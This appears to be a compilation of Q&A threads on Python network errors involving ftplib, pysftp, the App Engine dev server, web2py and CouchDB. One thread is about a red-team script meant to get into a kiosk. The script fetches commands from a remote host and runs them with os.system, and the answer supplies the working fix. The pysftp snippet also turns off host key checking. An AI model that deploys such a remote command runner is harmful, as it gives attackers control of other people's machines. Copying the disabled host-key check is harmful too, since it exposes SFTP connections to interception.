ftplib connection error error_proto 150 in Python

I'm using this code to connect to an FTP server and get a directory listing. It works, but on some computers I receive ftplib.error_proto: 150. What is the meaning of this error? Is it caused by anti-virus software or permission issues? My OS is Windows XP.
Edit:
#http_pool = urllib3.connection_from_url(myurl)
#r1 = http_pool.get_url(myurl)
#print r1.data
Sorry, I posted the wrong code above. I'm using ftplib:
from ftplib import FTP

self.ftp = FTP(webhost)
self.ftp.login(username, password)
x = self.ftp.retrlines('LIST')  # prints the listing to stdout, returns the final status line
Error message:
File "ftplib.pyo", line 421, in retrlines
File "ftplib.pyo", line 360, in transfercmd
File "ftplib.pyo", line 329, in ntransfercmd
File "ftplib.pyo", line 243, in sendcmd
File "ftplib.pyo", line 219, in getresp
ftplib.error_proto: 150
Thanks.

Unfortunately, urllib3 does not support the FTP protocol. We've given some thought to adding support for more protocols, but it's not going to happen soon.
For FTP, have a look at things like ftplib or one of the many options on PyPI.
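For example, a minimal directory listing with ftplib might look something like this (the host and credentials are placeholders):
# A minimal ftplib sketch; ftp.example.com and the credentials are placeholders.
from ftplib import FTP

ftp = FTP('ftp.example.com')           # connect on the default port 21
ftp.login('user', 'password')          # or ftp.login() for anonymous access
entries = []
ftp.retrlines('LIST', entries.append)  # one callback call per listing line
ftp.quit()
print('\n'.join(entries))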

I was getting the same error. I tried following the same steps through the console. For me, this error was thrown when there was a network connection issue, so I wrote a function with the @retry decorator from the retrying package, to keep retrying the connection to the remote host until it succeeds (here waiting a random 1-2 seconds between attempts):
Example:
from retrying import retry

@retry(wait_random_min=1000, wait_random_max=2000)
def connect_to_remote(self):
    self.ftp = FTP(webhost)
    self.ftp.login(username, password)
    x = self.ftp.retrlines('LIST')
    print(x)

Related

python read and run commands from a remote text file

I have a script that is supposed to read a text file from a remote server and then execute whatever is in that text file.
For example, if the text file contains the command "ls", the computer will run it and list the directory.
Also, please don't suggest using urllib2 or whatever; I want to stick with Python 3.x.
As soon as I run it, I get this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
data = urllib.request.urlopen(IP_Address)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
raise ValueError("unknown url type: %r" % self.full_url)
ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import os
import urllib.request

IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)  # fails: the URL has no scheme
for line in data:
    print("####")
    os.system(line)
Edit:
Yes, I realize this is a bad idea. It is a school project; we are playing red team and are supposed to get access to a kiosk. I figured that instead of writing code to get around intrusion detection and firewalls, it would be easier to execute commands from a remote server. Thanks for the help, everyone!
The error occurs because your URL does not include a protocol. Include "http://" (or "https://" if you're using SSL/TLS) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
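For illustration, a sketch of the corrected script with that fix applied (plain HTTP assumed, and decoding the bytes that urlopen yields in Python 3; domain.com is the question's placeholder host):
import os
import urllib.request

url = "http://domain.com/test.txt"   # scheme added
data = urllib.request.urlopen(url)
for line in data:
    command = line.decode().strip()  # urlopen yields bytes in Python 3
    print("####")
    os.system(command)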
Try "http://localhost/domain.com/test.txt" or a remote address. If you use localhost, you need to run an HTTP server locally.

Python pysftp.put raises "No such file" exception although file is uploaded

I am using pysftp to connect to a server and upload a file to it.
cnopts = pysftp.CnOpts()
cnopts.hostkeys = None
self.sftp = pysftp.Connection(host=self.serverConnectionAuth['host'],
                              port=self.serverConnectionAuth['port'],
                              username=self.serverConnectionAuth['username'],
                              password=self.serverConnectionAuth['password'],
                              cnopts=cnopts)
self.sftp.put(localpath=self.filepath+filename, remotepath=filename)
Sometimes it completes with no error, but sometimes it puts the file correctly BUT raises the following exception. The file is read and processed by another program running on the server, so I can see that the file is there and is not corrupted:
File "E:\Anaconda\envs\py35\lib\site-packages\pysftp\__init__.py", line 364, in put
confirm=confirm)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 727, in put
return self.putfo(fl, remotepath, file_size, callback, confirm)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 689, in putfo
s = self.stat(remotepath)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 460, in stat
t, msg = self._request(CMD_STAT, path)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 780, in _request
return self._read_response(num)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 832, in _read_response
self._convert_status(msg)
File "E:\Anaconda\envs\py35\lib\site-packages\paramiko\sftp_client.py", line 861, in _convert_status
raise IOError(errno.ENOENT, text)
FileNotFoundError: [Errno 2] No such file
How can I prevent the exception?
From the described behaviour, I assume that the file is removed very shortly after it is uploaded, by some server-side process.
By default, pysftp.Connection.put verifies the upload by checking the size of the target file. If the server-side process manages to remove the file too quickly, reading the file size fails.
You can disable the post-upload check by setting the confirm parameter to False:
self.sftp.put(localpath=self.filepath+filename, remotepath=filename, confirm=False)
I believe the check is redundant anyway, see
How to perform checksums during a SFTP file transfer for data integrity?
For a similar question about Paramiko (which pysftp uses internally), see:
Paramiko put method throws "[Errno 2] File not found" if SFTP server has trigger to automatically move file upon upload
I also had this issue of the file automatically getting moved before Paramiko could do a stat on the uploaded file and compare the local and uploaded file sizes.
@Martin_Prikryl's solution works fine for removing the error by passing confirm=False when using sftp.put or sftp.putfo.
If you still want this check to run, to verify the file has been uploaded fully, you can do something along the following lines. For this to work you will need to know the location the file is moved to and have permission to read it.
import os

sftp.putfo(source_file_object, destination_file, confirm=False)
upload_size = sftp.stat(moved_path).st_size                  # remote size, at the post-move path
local_size = os.fstat(source_file_object.fileno()).st_size   # local size, from the uploaded file object
if upload_size != local_size:
    raise IOError(
        "size mismatch in put! {} != {}".format(upload_size, local_size)
    )
Both sizes come from stat calls: sftp.stat on the remote side and os.fstat locally.

dev-server HTTP Error 403: Forbidden

After updating from 1.7.5 (where everything worked fine), I'm getting an HTTP Error 403: Forbidden when trying to open any site via localhost. The strange thing is that I have pretty much the same setup at home as here at work, and everything works there... It might be an issue with the proxy server we're using at work, since that's the only difference I can think of. Here's the error log I'm getting, so if anyone knows what's going on, please help (;
Traceback (most recent call last):
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 1302, in communicate
req.respond()
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 831, in respond
self.server.gateway(self).respond()
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 2115, in respond
response = self.req.server.wsgi_app(self.env, self.start_response)
File "U:\Dev\GAE\google\appengine\tools\devappserver2\wsgi_server.py", line 246, in __call__
return app(environ, start_response)
File "U:\Dev\GAE\google\appengine\tools\devappserver2\request_rewriter.py", line 311, in _rewriter_middleware
response_body = iter(application(environ, wrapped_start_response))
File "U:\Dev\GAE\google\appengine\tools\devappserver2\python\request_handler.py", line 89, in __call__
self._flush_logs(response.get('logs', []))
File "U:\Dev\GAE\google\appengine\tools\devappserver2\python\request_handler.py", line 220, in _flush_logs
apiproxy_stub_map.MakeSyncCall('logservice', 'Flush', request, response)
File "U:\Dev\GAE\google\appengine\api\apiproxy_stub_map.py", line 94, in MakeSyncCall
return stubmap.MakeSyncCall(service, call, request, response)
File "U:\Dev\GAE\google\appengine\api\apiproxy_stub_map.py", line 320, in MakeSyncCall
rpc.CheckSuccess()
File "U:\Dev\GAE\google\appengine\api\apiproxy_rpc.py", line 156, in _WaitImpl
self.request, self.response)
File "U:\Dev\GAE\google\appengine\ext\remote_api\remote_api_stub.py", line 200, in MakeSyncCall
self._MakeRealSyncCall(service, call, request, response)
File "U:\Dev\GAE\google\appengine\ext\remote_api\remote_api_stub.py", line 226, in _MakeRealSyncCall
encoded_response = self._server.Send(self._path, encoded_request)
File "U:\Dev\GAE\google\appengine\tools\appengine_rpc.py", line 393, in Send
f = self.opener.open(req)
File "U:\Dev\Python\lib\urllib2.py", line 410, in open
response = meth(req, response)
File "U:\Dev\Python\lib\urllib2.py", line 523, in http_response
'http', request, response, code, msg, hdrs)
File "U:\Dev\Python\lib\urllib2.py", line 448, in error
return self._call_chain(*args)
File "U:\Dev\Python\lib\urllib2.py", line 382, in _call_chain
result = func(*args)
File "U:\Dev\Python\lib\urllib2.py", line 531, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 403: Forbidden
INFO 2013-04-19 12:28:52,576 server.py:561] default: "GET / HTTP/1.1" 500 -
INFO 2013-04-19 12:28:52,619 server.py:561] default: "GET /favicon.ico HTTP/1.1" 304 -
Also, the launcher throws an error when closing:
Traceback (most recent call last):
File "launcher\mainframe.pyc", line 327, in OnStop
File "launcher\taskcontroller.pyc", line 167, in Stop
File "launcher\dev_appserver_task_thread.pyc", line 82, in stop
File "launcher\taskthread.pyc", line 107, in stop
File "launcher\platform.pyc", line 397, in KillProcess
pywintypes.error: (5, 'TerminateProcess', 'Access is denied.')
I had this very same issue on Mac OS X when using a proxy server, with Google App Engine Launcher 1.8.6. Apparently there's an issue with proxy_bypass in urllib2.py.
There are two possible solutions:
- Downgrade to 1.7.5. But who wants to downgrade?
- Edit "[GAE Installation path]/google/appengine/tools/appengine_rpc.py" and look for the line that says:
opener.add_handler(fancy_urllib.FancyProxyHandler())
On my computer it was line 578. Put a hash (#) at the beginning of the line, like this:
#opener.add_handler(fancy_urllib.FancyProxyHandler())
Save the file, then stop and restart your application. Now dev_appserver.py shouldn't try to use any proxy server at all.
If your application uses any external resources, like a SOAP web service or something like that, and you can't reach the server without the proxy, then you'll have to downgrade. Keep in mind that external JavaScript files (like the Facebook SDK or similar) are loaded by your browser, not by your application.
Since I'm not using any external REST or SOAP services, it worked for me!
Hopefully it will work for you as well.
Try either:
- Accessing it through a different proxy, i.e. a proxy within a proxy
- Accessing it through your local IP, e.g. 192.168.1.1
I faced the same issue with version 1.9.5. It seems that the API proxy sends some RPCs to the proxy server, which are then rejected with HTTP 403 (since proxy servers are generally configured to reject connection attempts to arbitrary ports). In my case I was using the urlfetch module in my app to access external web pages, so disabling the proxy server was not an option for me.
This is how I worked around the issue some time back (it was most probably based on comments found under this issue, but I cannot remember the exact sources).
NOTE:
For this approach to work, you'll have to know the hostname/IP address and default port of your proxy server, and change them appropriately in the code if you happen to connect to a different proxy server.
When you are not behind the proxy server, you will have to revert the applied changes in order to return to a working state (if you want internet access inside your app).
Here it goes:
Disable proxy settings for the Python (Google App Engine Launcher) environment in some way. (In my case it was easy, since I was launching dev_appserver.py from a Terminal shell on Linux, and the unset http_proxy and unset https_proxy commands did the trick.)
Edit {App Engine SDK root}/google/appengine/api/urlfetch_stub.py. Find the code block
if _CONNECTION_SUPPORTS_TIMEOUT:
    connection = connection_class(host, timeout=deadline)
else:
    connection = connection_class(host)
(lines 376-379 in my case) and replace it with:
if _CONNECTION_SUPPORTS_TIMEOUT:
    if host[:9] == 'localhost' or host[:9] == '127.0.0.1':
        connection = connection_class(host, timeout=deadline)
    else:
        connection = connection_class('your_proxy_host_goes_here', your_proxy_port_number_goes_here, timeout=deadline)
else:
    if host[:9] == 'localhost' or host[:9] == '127.0.0.1':
        connection = connection_class(host)
    else:
        connection = connection_class('your_proxy_host_goes_here', your_proxy_port_number_goes_here)
replacing the placeholders your_proxy_host_goes_here and your_proxy_port_number_goes_here with appropriate values.
(I believe this code can be written more elegantly, though... any Python geeks out there? :) )
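One tidier sketch of the same patch, for what it's worth (behaviour unchanged; the placeholders still need real values, and this is untested against the SDK):
# Route non-local hosts through the proxy; placeholders as above.
_PROXY = ('your_proxy_host_goes_here', your_proxy_port_number_goes_here)

if host.startswith(('localhost', '127.0.0.1')):
    args = (host,)
else:
    args = _PROXY

if _CONNECTION_SUPPORTS_TIMEOUT:
    connection = connection_class(*args, timeout=deadline)
else:
    connection = connection_class(*args)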
In my case, I also had to delete the existing compiled file urlfetch_stub.pyc (located in the same directory as urlfetch_stub.py) because the SDK didn't seem to pick up the changes until I did so.
Now you can use dev_appserver to launch your app, and use urlfetch-backed services within the app, free from HTTP 403 errors.

web2py error: Connection reset by peer

I've been googling for days trying to find a straight answer for why this is happening, but can't find anything useful. I have a web2py application that simply reads a database and makes some requests to a REST api. It is a healthcheck monitor so it refreshes itself every minute. There are about 20 or so users at any given time. Here is the error I'm seeing very consistently in the log file:
ERROR:Rocket.Errors.Port8080:Traceback (most recent call last):
File "/opt/apps/web2py/gluon/rocket.py", line 562, in listen
sock = self.wrap_socket(sock)
File "/opt/apps/web2py/gluon/rocket.py", line 506, in wrap_socket
ssl_version = ssl.PROTOCOL_SSLv23)
File "/usr/local/lib/python2.7/ssl.py", line 342, in wrap_socket
ciphers=ciphers)
File "/usr/local/lib/python2.7/ssl.py", line 121, in __init__
self.do_handshake()
File "/usr/local/lib/python2.7/ssl.py", line 281, in do_handshake
self._sslobj.do_handshake()
error: [Errno 104] Connection reset by peer
Based on some googling, the most promising piece of information is that someone is trying to connect through a firewall, which kills the connection. However, I don't understand why it takes the whole application down. The process is still running, but no one can connect and I have to restart web2py.
I will be very appreciative of any input here. I'm beyond frustration.
Thanks!
The most common source of "Connection reset by peer" errors is that the remote client decides it doesn't want to talk to you anymore and cancels the interaction (with a shutdown/RST packet). This happens, for example, if the user navigates to a different page while the site is loading.
In your case, the remote host gave up on the connection even before you got to read or write anything on it. With a current web2py, this should only produce the warning you're seeing, and not terminate anything.
If you have a current web2py, the inability to connect is unrelated to these error messages. If you have an old version of web2py, you should update.
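To illustrate the mechanism, here is a toy client (an assumption for demonstration, not the questioner's setup) that triggers exactly this kind of reset by dropping the connection mid-handshake:
import socket
import struct

s = socket.create_connection(('localhost', 8080))
# l_onoff=1, l_linger=0 makes close() send an RST instead of a normal FIN
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
s.close()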

httplib2 throws an error when trying to make a request to CouchDB

I'm building an application in Python 2.6 that needs to get data from CouchDB. I'm using CouchDB-0.8-py2.6 to connect to the database.
I'm using this code:
import couchdb
server = couchdb.Server(url='http://localhost:5984/', full_commit=True, session=None)
db = server['databaseName']
doc = db['docId']
value = doc['value']
print(value)
On my local machine (OS X) the code runs perfectly, but when I try to run it on a Debian server, I get the following error:
File "/usr/local/lib/python2.6/dist-packages/CouchDB-0.7dev_r199-py2.6.egg/couchdb/client.py", line 165, in __getitem__
db.resource.head() # actually make a request to the database
File "/usr/local/lib/python2.6/dist-packages/CouchDB-0.7dev_r199-py2.6.egg/couchdb/client.py", line 977, in head
return self._request('HEAD', path, headers=headers, **params)
File "/usr/local/lib/python2.6/dist-packages/CouchDB-0.7dev_r199-py2.6.egg/couchdb/client.py", line 1010, in _request
resp, data = _make_request()
File "/usr/local/lib/python2.6/dist-packages/CouchDB-0.7dev_r199-py2.6.egg/couchdb/client.py", line 1005, in _make_request
body=body, headers=headers)
File "/usr/local/lib/python2.6/dist-packages/httplib2-0.6.0-py2.6.egg/httplib2/__init__.py", line 1025, in request
cached_value = self.cache.get(cachekey)
AttributeError: 'bool' object has no attribute 'get'
I've tried to Google this numerous times and no-one seems to have the same error. Does anyone have an idea what I'm doing wrong here?
You're using a different version of the CouchDB library on the server: CouchDB-0.7dev_r199 instead of 0.8. CouchDB does not use httplib2 anymore, so if you get your development and server environments roughly the same, the problem is quite likely to disappear.
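As a quick sanity check, you could print the installed library version on both machines (assuming these releases expose a __version__ attribute, which is my assumption here):
# Print the installed couchdb-python version; __version__ is assumed to exist.
import couchdb
print(couchdb.__version__)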
